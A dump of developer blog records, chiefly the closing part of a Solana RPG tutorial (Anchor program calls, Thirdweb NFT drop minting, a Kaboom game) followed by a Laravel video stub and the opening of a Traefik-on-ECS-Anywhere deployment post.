// authority: pg.wallet.publicKey,
newUserAccount: userAccountAddress,
// systemProgram: new PublicKey("11111111111111111111111111111111"),
// rent: new PublicKey("SysvarRent111111111111111111111111111111111")
})
.rpc();
```
On the next line, we wait for confirmation that the transaction has been successfully finalized. Therefore, we are waiting for the account to be successfully created and updated with the default values.
```ts
await pg.connection.confirmTransaction(txHash);
```
Once it is confirmed, we can fetch the account data and log the result.
```ts
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
```
This is going to be useful for us to implement contract calls later on from the frontend with the Thirdweb Solana SDK. As stated at the beginning of the overview, we also want the user to mint a free NFT to get access to the game. To attain that, we are going to create the NFT Collection Drop so people can claim it.
## The Collection

### Generate the PNGs
Players would be required to have our NFT to be able to play the game. The nfts need to be claimable. To achieve this, we will use the thirdweb nft drop program. The first step is to create the layers of the design. The most popular tools are Photoshop, Illustrator, or Figma. For this tutorial you can use mine, which you can copy from my [figma file](https://www.figma.com/community/file/1166287637845780926) where you can make any changes you wish, or use the exported PNGs from the `art_layers` folder.

To combine the layers, we will use the Hashlips art engine. To make it better, we are going to use the modified version by Waren Gonzaga adapted for Thirdweb. Clone the repository with.
```text
git clone https://github.com/warengonzaga/thirdweb-art-engine.git
```
Remove all the folders inside the layer folders. Put the folders of our art inside there. Go to the config file under the src folder. Change the `namePrefix` and description of your collection here. Change the `layersOrder` to the folder you placed inside the layers folder and change growEditionSizeTo to the number of PNGs you want to generate.
Use yarn to install the dependencies and run:
```text
yarn generate && yarn generate_thirdweb
```
to generate the art and create a folder for thirdweb.
### Setup wallet
Install the Phantom Wallet Chrome Extension from here: [https://phantom.app/](https://phantom.app/). Create a new wallet by following the instructions indicated by Phantom. It's very important to keep safe the recovery phrase of 12 words. Switch to DEVNET.

If you intend to use this wallet directly, you can copy your wallet address and open the terminal to run the solana cli to airdrop yourself 2 SOL.
```text
solana airdrop 2 WALLET_ADDRESS
```
What I did is to import a second wallet generated from the terminal shown in the setup section above, so I separated the wallet where I hold real assets and the second wallet, which is used only for testing purposes for security concerns. Open the keypair json file by running
```text
$ solana config get
...
Keypair Path: /Users/USERNAME/.config/solana/id.json
```
To open the path, hold down the cmd or CTRL key and click on it.You can also access the file by going to the path with File Explorer. The content looks like this `[12, 21, 45]`. In the Phantom Wallet, click on the icon and your wallet name again. Click on Add/Connect Wallet-> Import private key and paste it there to import.
### Deploy and upload
Head to the Thirdweb Dashboard at [https://thirdweb.com/dashboard](https://thirdweb.com/dashboard). Link to your Phantom Wallet. Click on the Deploy New Program button. Choose the NFT drop. Give it a name; Dungeon3, in my case. Set the Total Supply to the NFT quantity we have generated. Change the Network to the Developer and click on Deploy Now.

Use Batch Upload, drag and drop the folder generated with the Hashlips engine, or click to select files.

You need to upload all of your NFTs that match the drop supply set when deploying the program. Set your claim conditions to enable users to start claiming them. In the claim conditions tab, we can change the drop start, royalties, and how much to charge. I set the total number of NFTS that can be claimed to the maximum supply and left the rest as is. Then we click on Save claim conditions.
## The Mint page

### Getting started
Set the environment variables. The variables required can be found in.env.example.
- The program ID comes from the program we deployed at the beginning.
- The collection address can be copied from the Thirdweb Dashboard, more specifically the nft drop that we have created for the collection.
- The RPC URL. You can be obtained one by creating an Alchemy account, then creating an app, and you can copy the url from the dashboard.
The project started with pnpm. The commands are the same for npm and yarn. To install the dependencies, run
```
pnpm install
```
and start the project on local with
```
pnpm dev
```
### Router
We want users to mint a nft from their collection to be able to play the game. With the help of `react-router-dom`, we create two pages with react. The mint page checks for the user's nft, and if the user does not have a nft yet, we allow the user to mint one. The user connects with the Phantom wallet and mints a free nft. Once it is minted, the user can play the game.
Create the router in `main.tsx` with `createBrowserRouter` and pass the router to the `RouterProvider`.
```tsx
import "@solana/wallet-adapter-react-ui/styles.css";
import React from "react";
import ReactDOM from "react-dom/client";
import { createBrowserRouter, RouterProvider } from "react-router-dom";
import App from "./App";
import { ContextProvider } from "./contexts/ContextProvider";
import MintPage from "./MintPage";
import "./styles/globals.css";
const router = createBrowserRouter([
{
path: "/",
element: <App />,
},
{
path: "mint",
element: <MintPage />,
},
]);
ReactDOM.createRoot(document.getElementById("root") as HTMLElement).render(
<React.StrictMode>
<ContextProvider>
<RouterProvider router={router} />
</ContextProvider>
</React.StrictMode>
);
```
The path mint takes the user to the mint page `MintPage.tsx`.
```ts
import MintPage from "./MintPage";
// ...
{
path: "mint",
element: <MintPage />,
},
```
It should be running at http://127.0.0.1:5173/mint
### Mint NFT
The `MintPage.tsx`:
```tsx
import { useWallet } from "@solana/wallet-adapter-react";
import { WalletMultiButton } from "@solana/wallet-adapter-react-ui";
import "@solana/wallet-adapter-react-ui/styles.css";
import { useEffect } from "react";
import { useNavigate } from "react-router-dom";
import useProgram from "./hooks/anchor";
import useTw from "./hooks/tw";
export default function MintPage() {
const { publicKey } = useWallet();
const navigate = useNavigate();
const { nftDrop, hasNft } = useTw();
const { initUserAnchor } = useProgram();
/**
* Check if the wallet has NFT
* Go to the game page if we find it.
*/
useEffect(() => {
if (hasNft === 1) {
navigate("/");
}
}, [hasNft]);
const mint = async () => {
if (!nftDrop || !publicKey) return;
try {
// Claim 1 NFT
const claimedAddresses = await nftDrop.claim(1);
console.log("Claimed NFT to: ", claimedAddresses[0]);
// Initialize user account
await initUserAnchor();
navigate("/");
} catch (error) {
alert("something went wront :(");
}
};
return (
<>
<div className="flex justify-around">
<div className="self-center">
<h2 className="font-bold">Dungeon3</h2>
</div>
<WalletMultiButton className="btn btn-primary" />
</div>
<div className="h-screen">
<div className="flex flex-col gap-3 h-[inherit] items-center justify-center">
<h2 className="font-bold">Dungeon3</h2>
<img src="/hero.png" alt="dungeon3" className="w-60" />
<span>Mint your Hero</span>
<button className="btn btn-primary" onClick={mint}>
Mint
</button>
</div>
</div>
</>
);
}
```
The player can connect the wallet to the Solana blockchain thanks to the wallet button component.
```html
<WalletMultiButton className="btn btn-primary" />
```
Then we have another button which allows the user to mint a NFT.
```html
<button className="btn btn-primary" onClick="{mint}">Mint</button>
```
The page will check if the user has an NFT of the collection first.
```ts
/**
* Check if the wallet has NFT
* Go to the game page if we find it.
*/
useEffect(() => {
if (hasNft === 1) {
navigate("/");
}
}, [hasNft]);
```
The mint function calls the `nftDrop` property from the `useTw()` hook
```ts
const { nftDrop } = useTw();
// ...
const mint = async () => {
if (!nftDrop || !wallet.publicKey) return;
try {
// Claim 1 NFT
const claimedAddresses = await nftDrop.claim(1);
console.log("Claimed NFT to: ", claimedAddresses[0]);
// Initialize user account
await initUserAnchor();
navigate("/");
} catch (error) {
alert("something went wront :(");
}
};
```
The `nftDrop` is initiated by the Thirdweb SDK. The SDK is initialized when the user connects the wallet.
```ts
import { NETWORK_URL, TW_COLLECTION_ADDRESS } from "@/utils/constants";
import { useWallet } from "@solana/wallet-adapter-react";
import "@solana/wallet-adapter-react-ui/styles.css";
import { NFTDrop, ThirdwebSDK } from "@thirdweb-dev/sdk/solana";
import { useEffect, useMemo, useState } from "react";
export default function useTw() {
const wallet = useWallet();
const { publicKey } = wallet;
const [nftDrop, setNftDrop] = useState<NFTDrop>();
const [hasNft, setHasNft] = useState(-1);
// Initialize sdk with wallet when wallet is connected
const sdk = useMemo(() => {
if (publicKey) {
const sdk = ThirdwebSDK.fromNetwork(NETWORK_URL);
sdk.wallet.connect(wallet);
return sdk;
}
}, [publicKey]);
// Initialize collection drop program when sdk is defined
useEffect(() => {
async function load() {
if (sdk) {
const nftDrop = await sdk.getNFTDrop(TW_COLLECTION_ADDRESS);
setNftDrop(nftDrop);
}
}
load();
}, [sdk]);
useEffect(() => {
async function getHasNft() {
try {
if (publicKey !== null && nftDrop !== undefined) {
const nfts = await nftDrop.getAllClaimed();
const userAddress = publicKey.toBase58();
const hasNFT = nfts.some((nft) => nft.owner === userAddress);
if (hasNFT === undefined) {
setHasNft(0);
} else {
setHasNft(1);
}
}
} catch (error) {
console.error(error);
}
}
getHasNft();
}, [publicKey, nftDrop]);
return {
sdk,
nftDrop,
hasNft,
};
}
```
When the app gets the user wallet address, the hook instanciate the Thirdweb SDK and gets the nft drop. It will use it to check if the user has an NFT of the collection with `getHasNft()`.
```ts
if (publicKey !== null && nftDrop !== undefined) {
const nfts = await nftDrop.getAllClaimed();
const userAddress = publicKey.toBase58();
const hasNFT = nfts.some((nft) => nft.owner === userAddress);
if (hasNFT === undefined) {
setHasNft(0);
} else {
setHasNft(1);
}
}
```
We also called `initUserAnchor()` when we called the mint function.
### Initiate user account
`initUserAnchor()` is imported from `hooks/anchor.ts`. We are using the Solana SDK to get the Anchor Program. The code should look familiar to you. We pasted the code we used for testing the program with tiny changes.
```ts
import { PROGRAM_ID } from "@/utils/constants";
import { Dungeon3, IDL } from "@/utils/idl";
import { BN, Program } from "@project-serum/anchor";
import { useWallet } from "@solana/wallet-adapter-react";
import "@solana/wallet-adapter-react-ui/styles.css";
import { PublicKey } from "@solana/web3.js";
import { useEffect, useState } from "react";
import useTw from "./tw";
export type SetUserAnchor = (
score: number,
health: number
) => Promise<string | undefined>;
export default function useProgram() {
const wallet = useWallet();
const { sdk } = useTw();
const [program, setProgram] = useState<Program<Dungeon3>>();
useEffect(() => {
// Load program when sdk is defined
load();
async function load() {
if (sdk) {
const { program }: { program: Program<Dungeon3> } =
(await sdk.getProgram(PROGRAM_ID.toBase58(), IDL)) as any;
setProgram(program);
}
}
}, [sdk]);
const initUserAnchor = async () => {
try {
if (!program || !wallet.publicKey) return;
// Find user account. PDA
const [userAccountAddress] = await PublicKey.findProgramAddress(
[Buffer.from("user"), wallet.publicKey.toBuffer()],
PROGRAM_ID
);
// Send transaction
const txHash = await program.methods
.initUser()
.accounts({
newUserAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
return txHash;
} catch (error) {
console.error(error);
return undefined;
}
};
const setUserAnchor = async (score: number, health: number) => {
try {
if (!program || !wallet.publicKey) return;
// Find user account. PDA
const [userAccountAddress] = await PublicKey.findProgramAddress(
[Buffer.from("user"), wallet.publicKey.toBuffer()],
PROGRAM_ID
);
// Send transaction
const txHash = await program.methods
.setUser(new BN(score), 0, health)
.accounts({
userAccount: userAccountAddress,
authority: wallet.publicKey,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
return txHash;
} catch (error) {
console.error(error);
return undefined;
}
};
return {
program,
initUserAnchor,
setUserAnchor,
};
}
```
## The Game

### Introduction
Kaboom is a Javascript game programming library that helps you make games quickly and with fun. We initiate kaboom in App.tsx and pass down the context to kaboom components.
All the game's static assets are located inside the assets folder. The sounds folder contains the mp3 and wav that play on player action. The main PNGs are located in the dungeon.png file. The dungeon.json file defines the pixels we want to extract from dungeon.png and defines the animations.
During the development, I encountered a class `extends value undefined is not a constructor or null` issue.
> Note:
> Polyfill issue. Some dependencies of the Metaplex SDK are still relying on node.js features that are not available in the browser by default. We are installing some polyfills via rollup plugins since Vite uses rollup under the hood the bundle for production. Thirdweb Solana SDK is built on top of Metaplex which means Metaplex issue are also reflected. [Learn more about the issue](https://github.com/metaplex-foundation/js/issues/343)
This repository has the polyfills installed, but if you have to start a new project with create-react-app or vite. Keep in mind that polyfills are required.
### Initiate and load assets
Let's break down the game, starting from the `App.tsx` file.
```ts
import { loadKaboom } from "@/components/kaboom";
import { WalletMultiButton } from "@solana/wallet-adapter-react-ui";
import "@solana/wallet-adapter-react-ui/styles.css";
import kaboom from "kaboom";
import { useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import useProgram from "./hooks/anchor";
import useTw from "./hooks/tw";
export default function Home() {
const { hasNft } = useTw();
const navigate = useNavigate();
const { setUserAnchor, program } = useProgram();
// Check if the user has the nft.
// Go to the mint page if the user hasn't.
useEffect(() => {
if (hasNft === 0) {
navigate("/mint");
}
}, [hasNft]);
// Get the canvas where we are going to load the game.
const canvasRef = useRef(
document.getElementById("canvas") as HTMLCanvasElement
);
useEffect(() => {
// Start kaboom with configuration
const k = kaboom({
global: false,
width: 640,
height: 480,
stretch: true,
letterbox: true,
canvas: canvasRef.current,
background: [0, 0, 0],
});
loadKaboom(k, setUserAnchor);
}, [program]);
return (
<>
<div className="flex justify-around">
<div className="self-center">
<h2 className="font-bold">Dungeon3</h2>
</div>
<WalletMultiButton className="btn btn-primary" />
</div>
<canvas
id="canvas"
width={window.innerWidth - 160}
height={window.innerHeight - 160}
ref={canvasRef}
></canvas>
</>
);
}
```
When the page is loaded, we initiate inside `useEffect` to create a new instance of kaboom. We set the canvas size to stretch to fit the container while keeping the width-to-height ratio.
```ts
const k = kaboom({
global: false,
width: 640,
height: 480,
stretch: true,
letterbox: true,
canvas: canvasRef.current,
background: [0, 0, 0],
});
```
Get the element with the id `canvas` as a reference. This allows React to render the game inside the canvas component. The 160px acts as a margin to the borders.
```ts
const canvasRef = useRef(
document.getElementById("canvas") as HTMLCanvasElement
);
// ... inside return
<canvas
id="canvas"
width={window.innerWidth - 160}
height={window.innerHeight - 160}
ref={canvasRef}
></canvas>;
```
We pass down the kaboom context.
```ts
import { loadKaboom } from "@/components/kaboom";
// ... k = Kaboom Context
loadKaboom(k, setUserAnchor);
```
Inside `kaboom/index.ts` we have:
```ts
import { SetUserAnchor } from "@/hooks/anchor";
import { KaboomCtx } from "kaboom";
import { OLDMAN, OLDMAN2, OLDMAN3 } from "../../utils/constants";
import { Game } from "./game";
import { Home } from "./home";
export const loadKaboom = (k: KaboomCtx, setUserAnchor: SetUserAnchor) => {
const { go, loadSpriteAtlas, loadSound, loadSprite, play, scene } = k;
/**
* Load Sprites and Sounds
*/
loadSpriteAtlas("/assets/dungeon.png", "/assets/dungeon.json");
loadSprite(OLDMAN, "/assets/OldMan/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSprite(OLDMAN2, "/assets/OldMan2/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSprite(OLDMAN3, "/assets/OldMan3/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSound("coin", "/assets/sounds/coin.wav");
loadSound("hit", "/assets/sounds/hit.mp3");
loadSound("wooosh", "/assets/sounds/wooosh.mp3");
loadSound("kill", "/assets/sounds/kill.wav");
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
const music = play("dungeon", {
volume: 0.2,
loop: true,
});
scene("home", () => Home(k));
scene("game", () => Game(k, setUserAnchor));
function start() {
// Start with the "game" scene, with initial parameters
go("home", {});
}
start();
};
```
We are going to use all the functions we are going to use in the first line to avoid using the context every time we invoke any function.
```ts
const { go, loadSpriteAtlas, loadSound, loadSprite, play, scene } = k;
```
We load the sprites and sound. If you are asking, what is a sprite? Sprites are images that represent game assets.
```ts
/**
* Load Sprites and Sounds
*/
loadSpriteAtlas("/assets/dungeon.png", "/assets/dungeon.json");
loadSprite(OLDMAN, "/assets/OldMan/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
// ...
loadSound("coin", "/assets/sounds/coin.wav");
loadSound("hit", "/assets/sounds/hit.mp3");
loadSound("wooosh", "/assets/sounds/wooosh.mp3");
loadSound("kill", "/assets/sounds/kill.wav");
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
const music = play("dungeon", {
volume: 0.2,
loop: true,
});
```
`loadSpriteAtlas` is one PNG file that aggregates several images, which is why we also have to pass in a json file that extracts each piece by defining its size with `width` and `height`. x and y for its coordinates`sliceX` and `anims` for its frames and configures its animation.
```json
"coin": {
"x": 288,
"y": 272,
"width": 32,
"height": 8,
"sliceX": 4,
"anims": {
"spin": {
"from": 0,
"to": 3,
"speed": 10,
"loop": true
}
}
},
```
For the animation configuration in `loadSprite,` we can pass in as the third. Then we have `loadSound` that loads a sound with a name and resource url.
```ts
loadSound("coin", "/assets/sounds/coin.wav");
```
Once an asset is loaded, we can use it by calling it by the name we gave to it.
```ts
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
play("dungeon", {
volume: 0.2,
loop: true,
});
```
Create 2 scenes. The home component contains a menu that allows the user to start a new game. We start by showing the Home component first by calling the function `start()` .
```ts
scene("home", () => Home(k));
scene("game", () => Game(k, setUserAnchor));
function start() {
// Start with the "game" scene, with initial parameters
go("home", {});
}
start();
```
### Map, characters, items and logics
The Home component has mostly the same elements that we are going to cover in the Game component, so let's move to the `game.ts` file directly.
Let's create the map for the game. Most game editors come with a visual editor that allows us to drag and drop items into it. Kaboom works a bit differently. We write the map in code. The addLevel requires two parameters. In the first parameter, we define where we want to place the game assets with symbols. You can use all the symbols you can imagine, plus numbers, uppercase and lowercase. Then in the second parameter, we define the size and associate each symbol with the sprite it stands for. The symbols work like HTML tags, and then when defining the sprite to the symbol, it's like adding CSS style to the HTML tag.
```ts
/**
* Map
*/
// map floor
addLevel(
[
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
],
{
width: 16,
height: 16,
" ": () => [sprite("floor", { frame: ~~rand(0, 8) })],
}
);
// map walls, enemies, items, coins...
const map = addLevel(
[
" ",
"tttttttttttttttttttttttttttttttttttttttt",
"qwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwd",
"l r",
"l $ r",
"l r",
"l ccc ccc ccc ccc r",
"l r",
"l ccc ccc ccc r",
"4ttttttttttttttttttttttttttttttttttttt r",
"ewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww r",
"l r",
"l c r",
"l ccccccccc r",
"l c r",
"l r",
"l r",
"4ttttttttttttttttttttttttttttttttttttttr",
"ewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwr",
"l r",
"l cccccccccccccccccccccccccccccccc r",
"l r",
"l cccccccccccccccccccccccccccccccc r",
"l r",
"l r",
"attttttttttttttttttttttttttttttttttttttb",
"wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww",
],
{
width: 16,
height: 16,
$: () => [sprite("chest"), area(), solid(), { opened: false }, "chest"],
c: () => [sprite("coin", { anim: "spin" }), area(), "coin"],
a: () => [sprite("wall_botleft"), area({ width: 4 }), solid()],
b: () => [
sprite("wall_botright"),
area({ width: 4, offset: vec2(12, 0) }),
solid(),
],
q: () => [sprite("wall_topleft"), area(), solid()],
4: () => [sprite("wall_topmidleft"), area(), solid()],
e: () => [sprite("wall_midleft"), area(), solid()],
d: () => [sprite("wall_topright"), area(), solid()],
w: () => [sprite("wall"), area(), solid()],
t: () => [
sprite("wall_top"),
area({ height: 4, offset: vec2(0, 12) }),
solid(),
],
l: () => [sprite("wall_left"), area({ width: 4 }), solid()],
r: () => [
sprite("wall_right"),
area({ width: 4, offset: vec2(12, 0) }),
solid(),
],
}
);
```
With the add function, we assemble a game object from a list of components and add it to the game. Position yourself on the map. A sprite takes the id of a loaded sprite. In loadSpriteAtlas we have defined all the ids in the json file. The collision area defines the collision area and enables collision detection with other objects. This allows us to increase the player's coin when the player touches a coin, for example. We used it for the walls and enemies so the player couldn't walk through them like a ghost.
```ts
/**
* Sprites
*/
const player = add([
pos(map.getPos(11, 11)),
sprite(HERO, { anim: "idle" }),
area({ width: 12, height: 12, offset: vec2(0, 6) }),
solid(),
origin("center"),
]);
const sword = add([
pos(),
sprite(SWORD),
origin("bot"),
rotate(0),
follow(player, vec2(-4, 9)),
area(),
spin(),
]);
const oldman = add([
OLDMAN,
sprite(OLDMAN),
pos(map.getPos(30, 12)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const oldman2 = add([
OLDMAN2,
sprite(OLDMAN2),
pos(map.getPos(8, 20)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const oldman3 = add([
OLDMAN3,
sprite(OLDMAN3),
pos(map.getPos(8, 4)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const ogre = add([
"ogre",
sprite("ogre"),
pos(map.getPos(6, 14)),
origin("bot"),
area({ scale: 0.5 }),
solid(),
]);
const monster = add([
"monster",
sprite("monster", { anim: "run" }),
pos(map.getPos(4, 7)),
origin("bot"),
patrol(100),
area({ scale: 0.5 }),
solid(),
]);
const monster2 = add([
"monster",
sprite("monster", { anim: "run" }),
pos(map.getPos(24, 9)),
origin("bot"),
patrol(100),
area({ scale: 0.5 }),
solid(),
]);
```
For the HUD (heads-up display) we add
```ts
/**
* HUD
*/
const counter = add([
text("Score: 0", { size: 18, font: "sinko" }),
pos(40, 4),
z(100),
fixed(),
{ value: 0 },
]);
const health = add([
sprite("health", { width: 18, height: 18 }),
pos(12, 4),
fixed(),
]);
```
Then we create functions used by characters and items that define the actions.
```ts
/**
* Logics
*/
// Spin the sword 360 degree
function spin() {
let spinning = false;
return {
angle: 0,
id: "spin",
update() {
if (spinning) {
this.angle += 1200 * dt();
if (this.angle >= 360) {
this.angle = 0;
spinning = false;
}
}
},
spin() {
spinning = true;
},
};
}
// Reduces the life of the player.
// Reset player stats and move to home if there is no life left.
function reduceHealth() {
switch (health.frame) {
case 0:
health.frame = 1;
break;
case 1:
health.frame = 2;
break;
default:
go("home");
counter.value = 0;
counter.text = "0";
health.frame = 0;
break;
}
}
// Make enemy to move left and right on collision
function patrol(speed = 60, dir = 1) {
return {
on: (obj: any, col: any) => console.log(),
move: (x: any, y: any) => console.log(),
id: "patrol",
require: ["pos", "area"],
add() {
this.on("collide", (obj: any, col: any) => {
if (col.isLeft() || col.isRight()) {
dir = -dir;
}
});
},
update() {
this.move(speed * dir, 0);
},
};
}
// Show a dialog box. The player can save their progress on-chain if accept.
function addDialog() {
const h = 160;
const btnText = "Yes";
const bg = add([
pos(0, height() - h),
rect(width(), h),
color(0, 0, 0),
z(100),
fixed(),
]);
const txt = add([
text("", {
size: 18,
}),
pos(vec2(300, 400)),
scale(1),
origin("center"),
z(100),
fixed(),
]);
const btn = add([
text(btnText, {
size: 24,
}),
pos(vec2(400, 400)),
area({ cursor: "pointer" }),
scale(1),
origin("center"),
z(100),
fixed(),
]);
btn.onUpdate(() => {
if (btn.isHovering()) {
btn.scale = vec2(1.2);
} else {
btn.scale = vec2(1);
cursor("default");
}
});
btn.onClick(() => {
setUserAnchor(counter.value, health.frame);
});
bg.hidden = true;
txt.hidden = true;
btn.hidden = true;
return {
say(t: string) {
txt.text = t;
bg.hidden = false;
txt.hidden = false;
btn.hidden = false;
},
dismiss() {
if (!this.active()) {
return;
}
txt.text = "";
bg.hidden = true;
txt.hidden = true;
btn.hidden = true;
},
active() {
return !bg.hidden;
},
destroy() {
bg.destroy();
txt.destroy();
},
};
}
const dialog = addDialog();
```
One thing to notice here is when the player interacts with the old man. The player can save the progress of the game by calling the `setUserAnchor(counter.value, health.frame);` function.
Define what happens when the player comes into contact with enemies or items.
```ts
/**
* on Player Collides
*/
// Reduce the player life when collides with the ogre enemy
player.onCollide("ogre", async (obj, col) => {
play("hit");
reduceHealth();
});
// Increase the score when the player touch a coin. Make disappear the coin.
player.onCollide("coin", async (obj, col) => {
destroy(obj);
play("coin");
counter.value += 10;
counter.text = `Score: ${counter.value}`;
});
// Reduce the player life when collides with the monster enemy
// Move the player a fixed distance in the opposite direction of the collision.
player.onCollide("monster", async (obj, col) => {
if (col?.isRight()) {
player.moveBy(-32, 0);
}
if (col?.isLeft()) {
player.moveBy(32, 0);
}
if (col?.isBottom()) {
player.moveBy(0, -32);
}
if (col?.isTop()) {
player.moveBy(0, 32);
}
if (col?.displacement) play("hit");
reduceHealth();
});
// When the sword collides with ogre, kill it and receive 100 coins.
sword.onCollide("ogre", async (ogre) => {
play("kill");
counter.value += 100;
counter.text = `Score: ${counter.value}`;
destroy(ogre);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN, (obj) => {
dialog.say(obj.msg);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN2, (obj) => {
dialog.say(obj.msg);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN3, (obj) => {
dialog.say(obj.msg);
});
```
Set the camera to be zoomed and follow the player, the movements and the animation.
```ts
/**
* Player Controls
*/
// Follow the player with the camera
camScale(vec2(2));
player.onUpdate(() => {
camPos(player.pos);
});
// Press space to spin the sword
// Open a chest if the player is touching it.
onKeyPress("space", () => {
let interacted = false;
every("chest", (c) => {
if (player.isTouching(c)) {
if (c.opened) {
c.play("close");
c.opened = false;
} else {
c.play("open");
c.opened = true;
counter.value += 500;
counter.text = `Score: ${counter.value}`;
}
interacted = true;
}
});
if (!interacted) {
play("wooosh");
sword.spin();
}
});
// Player movement controls
onKeyDown("right", () => {
player.flipX(false);
sword.flipX(false);
player.move(SPEED, 0);
sword.follow.offset = vec2(-4, 9);
});
onKeyDown("left", () => {
player.flipX(true);
sword.flipX(true);
player.move(-SPEED, 0);
sword.follow.offset = vec2(4, 9);
});
onKeyDown("up", () => {
player.move(0, -SPEED);
});
onKeyDown("down", () => {
player.move(0, SPEED);
});
// Player animation while stationary and in motion
onKeyRelease(["left", "right", "up", "down"], () => {
player.play("idle");
});
onKeyPress(["left", "right", "up", "down"], () => {
dialog.dismiss();
player.play("run");
});
```
Congratulations! Now you know how to build an RPG game on Solana!
## What’s Next?
You have done an awesome job! I know the content is dense and you made it to the end! The app is not complete; it is a starting point in the development of Web3 Applications. From the knowledge that you have acquired, you can move forward, building your own ideas. Here, I am going to leave you some features you can add to the app:
1. Import game progress from a user account.
2. Fetch NFT Collection Metadata and add the items to the game.
3. Export game assets to NFTs or export coins to tokens.
4. Add more items, levels, or enemies.
5. Use the NFT character as a playable hero with different stats.
Star this [Github Repository](https://github.com/aeither/dungeon3) to help reach more people.
## Credits
Dungeon tileset II - https://0x72.itch.io/dungeontileset-ii
## Conclusion
In this guide, you learned how to build an RPG on Solana. We covered the on-chain program's code using the Seahorse framework with the Python programming language. Thirdweb suits for the NFT collection drop, the mint, and the program code. Load, create, and use game assets with Kaboom.
I hope you found it useful. Consider diving into [Seahorse](https://seahorse-lang.org/), [Thirdweb](https://thirdweb.com/network/solana) or [Kaboom](https://github.com/replit/kaboom) to learn more about the tools we have used.
Let's connect on [Twitter](https://twitter.com/giovannifulin) .
| aeither |
1,230,798 | Laravel: How to have custom “groupBy”? | A post by Sajad DP | 0 | 2022-10-26T12:33:00 | https://dev.to/sajaddp/laravel-how-to-have-custom-groupby-524k | laravel, php | {% youtube U8jVflN-eUY %} | sajaddp |
1,230,924 | ECS Anywhere & Traefik Proxy with ECS Compose-X | Original post can be found here along with the technical resources TL;DR Using ECS... | 0 | 2022-11-14T17:58:14 | https://dev.to/aws-builders/ecs-anywhere-traefik-proxy-with-ecs-compose-x-2k58 | aws, traefik, ecs, tutorial | [Original post can be found here](https://labs.compose-x.io/apps/traefik_ecs_part2.html) along with [the technical resources](https://github.com/compose-x/compose-x-labs/tree/main/traefik/part_2)
## TL;DR
Using [ECS Compose-X](https://docs.compose-x.io), deploy [Traefik Proxy](https://github.com/traefik/traefik) on-premise with [AWS ECS Anywhere](https://aws.amazon.com/ecs/anywhere/) with only a few changes from running on AWS EC2 or AWS Fargate.
---
## Introduction
### Our tools for today's lab
[ECS Compose-X](https://docs.compose-x.io) is an open-source project that allows you to use docker-compose services definitions, and render CFN templates (just like with AWS CDK, but without having to write code) to deploy your application service stacks.
[Traefik Proxy](https://github.com/traefik/traefik) is an open source project that will allow you to define ingress rules for your applications and will automatically route traffic to your backend services based on various rules. It is also capable of doing Service Discovery, and today we are going to look at the ECS & ECS Anywhere discovery providers.
[AWS ECS Anywhere](https://aws.amazon.com/ecs/anywhere/) is an extension to [AWS ECS](), which is a managed container orchestration service, that now allows you to run your workloads in your datacenter/on-premise, and really just, anywhere!
### The objective
When running on AWS, we have access to services such as AWS Certificates Manager (ACM), AWS Load Balancing (manages ELB, ALB, NLB and more), which can offload a lot of complexity and is very feature rich.
However, coming to on-premise environments, the costs for hardware that would give us the same functionalities (think F5 load-balancers, your expensive licensed VXLAN resources), are only affordable by a few. And typically for a "home-labber" such as myself, way out of my budget.
So I needed an alternative solution that would allow me to use AWS ECS services, route traffic to my services based on service discovery. It should also be able to deal with managing SSL certificates for me. And finally, I must be able to deal with non-persistent storage.
## Welcome Traefik Proxy
For years, I have been an NGINX and/or HA Proxy user. They are very lightweight, very popular, great documentation and community support in general.
But, they aren't quite capable of doing Service discovery all by themselves.
I came across Traefik Proxy, and a whole new world of capabilities was now wide open. With service discovery providers, Traefik can scrape your services and based on labels/tags, identify instructions to perform. And AWS ECS is one of such providers.
### Just a tiny little problem
When I first tried Traefik a little over a year ago for ECS Anywhere, it wouldn't work. That's because until then, Traefik only considered using Fargate or EC2 instances to run the containers. There was no implementation of discovering AWS ECS Anywhere on-prem instances.
**This has been since addressed, and one can specifically enable the ECS Anywhere discovery in Traefik.**
### Traefik and Let's Encrypt SSL management
When you define routers with Let's Encrypt, you can define whether or not you want Traefik to provision certificates.
With Traefik, you can automatically get new certificates for yourself when you need them. There are different validation methods, my chosen one being with DNS validation.
For validation, given my DNS domain is managed in Route53, I simply indicate to Traefik to use that DNS method / zone for validation.
#### Why DNS validation works for me?
If I have internally exposed services (not available on the internet), but I still want to have SSL certificates provisioned for them, DNS is the only option for that. It will generally come down to your preference.
## Deployment
### Prerequisites
You will need
* An AWS Account
* Configured a local user with IAM permissions to deploy resources
* Have an existing ECS Cluster with a registered ECS Instance that runs on-premise.
